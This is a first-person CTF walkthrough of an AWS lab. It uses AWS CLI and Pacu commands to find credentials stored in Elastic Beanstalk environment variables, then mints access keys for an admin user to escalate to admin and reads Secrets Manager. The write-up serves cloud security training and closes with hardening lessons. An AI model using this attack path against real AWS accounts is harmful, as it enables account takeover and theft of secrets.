AWS Beanstalk Secrets CTF Walkthrough
Overview
In this capstone challenge, I tackled the Beanstalk Secrets scenario on GitHub. This scenario was based on a real AWS penetration test and presented an excellent opportunity to practice cloud security skills.
One interesting aspect of this challenge was that it required research on the AWS Elastic Beanstalk service, which wasn’t explicitly covered in previous training materials. This reflects real-world penetration testing, where you often need to research and enumerate unfamiliar services.
Scenario
I was hired as an AWS Penetration Tester for Hack Smarter. The company uses Elastic Beanstalk to host some of their public-facing web applications. I was provided with a low-level account that has access to Elastic Beanstalk.
Mission Objectives:
- Research Elastic Beanstalk and identify common misconfigurations
- Leverage findings to escalate privileges to admin access
Initial Reconnaissance
First, I configured AWS CLI with the provided low-privilege credentials and began basic enumeration:
aws sts get-caller-identity --profile init
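For reference, standing up the init profile with the provided keys typically looks like the following; the access key values here are placeholders, not the scenario's real credentials:
# Store the provided low-privilege keys under a named CLI profile (placeholder values)
aws configure set aws_access_key_id AKIAXXXXXXXXEXAMPLE --profile init
aws configure set aws_secret_access_key wJalrXUtnFIexampleSecretKeyValue --profile init
# Region is an assumption based on the enumeration later in this writeup; adjust as needed
aws configure set region eu-west-1 --profile init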
I attempted to gather more information about the user but faced permission restrictions:
aws iam get-user --profile init
Permission Exploration
I tried to determine what policies were attached to the user:
aws iam list-attached-user-policies --user-name cgidmws70jym0c_low_priv_user --profile init
Group membership was also restricted:
aws iam list-groups-for-user --user-name cgidmws70jym0c_low_priv_user --profile init
Role listing was blocked as well:
aws iam list-roles --profile init
Leveraging Pacu for AWS Enumeration
Since manual enumeration was hitting roadblocks, I turned to Pacu, an AWS exploitation framework. First, I tried exploring DynamoDB:
Pacu (init:imported-init) > run dynamodb__enum --regions eu-west-1
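As a side note, Pacu will not run modules until keys are loaded into a session. A minimal sketch of that setup, assuming Pacu is installed with its pacu entry point on PATH and that the session and CLI profile are both named init (names inferred from the prompt shown above):
# Launch the Pacu shell and create/select a session named "init" when prompted
pacu
# Inside the Pacu shell, import keys from the AWS CLI profile of the same name;
# the imported key set then shows up in the prompt as "imported-init"
import_keys init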
Discovering Secrets in Elastic Beanstalk
Given the scenario hint about Elastic Beanstalk, I focused on enumerating that service using Pacu:
Pacu (init:imported-init) > run elasticbeanstalk__enum
This was the key finding! The Elastic Beanstalk environment contained environment variables with secondary AWS credentials. This is a common misconfiguration where secrets are stored in plaintext environment variables.
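The same environment properties can also be pulled manually with the AWS CLI, which is useful when Pacu isn't an option; the application and environment names below are placeholders for whatever the earlier enumeration returns:
# List the Beanstalk applications and environments visible to the low-privilege profile
aws elasticbeanstalk describe-applications --profile init --region eu-west-1
aws elasticbeanstalk describe-environments --profile init --region eu-west-1
# Dump the environment configuration; plaintext environment properties appear under the
# aws:elasticbeanstalk:application:environment namespace in the OptionSettings output
aws elasticbeanstalk describe-configuration-settings --application-name example-app --environment-name example-env --profile init --region eu-west-1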
Privilege Escalation: First Step
Using the discovered secondary credentials, I configured a new AWS CLI profile and verified the identity:
aws sts get-caller-identity --profile sec
I gathered more information about this secondary user:
aws iam get-user --profile sec
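With a new identity in hand, it is also worth checking its permissions directly; a quick sketch of the standard IAM checks, with the user and policy names as placeholders:
# Managed policies attached directly to the secondary user
aws iam list-attached-user-policies --user-name secondary_user --profile sec
# Inline policies on the user, then the policy document itself
aws iam list-user-policies --user-name secondary_user --profile sec
aws iam get-user-policy --user-name secondary_user --policy-name example_policy --profile sec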
The Final Escalation
I ran Pacu’s privilege escalation scanner to identify potential paths to admin access:
Pacu (sec:imported-sec) > run iam__privesc_scan
The scan revealed that the secondary user had the iam:CreateAccessKey permission for the admin user! This is a critical permission: it allows creating new access keys for other users, which effectively hands over that user's access. The scanner chained straight into the matching exploitation module:
[iam__privesc_scan] Running module iam__backdoor_users_keys...
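For the record, the same escalation can be performed by hand once the permission is known; a minimal sketch with the AWS CLI, where the admin user name is a placeholder for the one the scan reported:
# Mint a fresh access key for the admin user using the secondary profile's permissions
aws iam create-access-key --user-name admin_user --profile sec
# Store the returned AccessKeyId and SecretAccessKey under a new "admin" profile (placeholder values)
aws configure set aws_access_key_id AKIAXXXXXXXXADMINKEY --profile admin
aws configure set aws_secret_access_key adminSecretKeyReturnedAboveExample --profile admin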
I now had admin credentials and verified the identity:
aws sts get-caller-identity --profile admin
Capturing the Flag
With admin access, I could now enumerate AWS Secrets Manager to find the flag:
Pacu (admin:imported-admin) > run secrets__enum --region us-east-1
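Pacu's module wraps what amounts to two Secrets Manager calls, which can also be run directly; the secret name below is a placeholder:
# List the secrets the admin identity can see in the region
aws secretsmanager list-secrets --profile admin --region us-east-1
# Retrieve the value of the interesting secret
aws secretsmanager get-secret-value --secret-id example_flag_secret --profile admin --region us-east-1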
The flag was: FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}
Key Lessons Learned
- Environment Variable Exposure: Storing sensitive credentials in plaintext environment variables is a dangerous practice that can lead to privilege escalation.
- Lateral Movement: I leveraged one set of credentials to discover another, ultimately leading to admin access.
- Access Key Creation: The ability to create access keys for other users is extremely powerful and should be tightly controlled (an example restriction is sketched after this list).
- Targeted Enumeration: Focusing on the service mentioned in the scenario (Elastic Beanstalk) paid off and directed the exploitation path.
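On the access key creation point, iam:CreateAccessKey can be scoped so that a user may only create keys for themselves; a sketch using an inline policy, with the user and policy names as placeholders (in practice this would usually live in a managed policy or infrastructure-as-code):
# Allow access key creation only on the caller's own IAM user via the aws:username policy variable
aws iam put-user-policy --user-name example_user --policy-name self-manage-access-keys --policy-document '{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": "iam:CreateAccessKey",
    "Resource": "arn:aws:iam::*:user/${aws:username}"
  }]
}'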
This CTF challenge demonstrates a realistic AWS attack path that security professionals might encounter in real-world penetration tests. Understanding these attack vectors is crucial for cloud security practitioners to properly secure their AWS environments.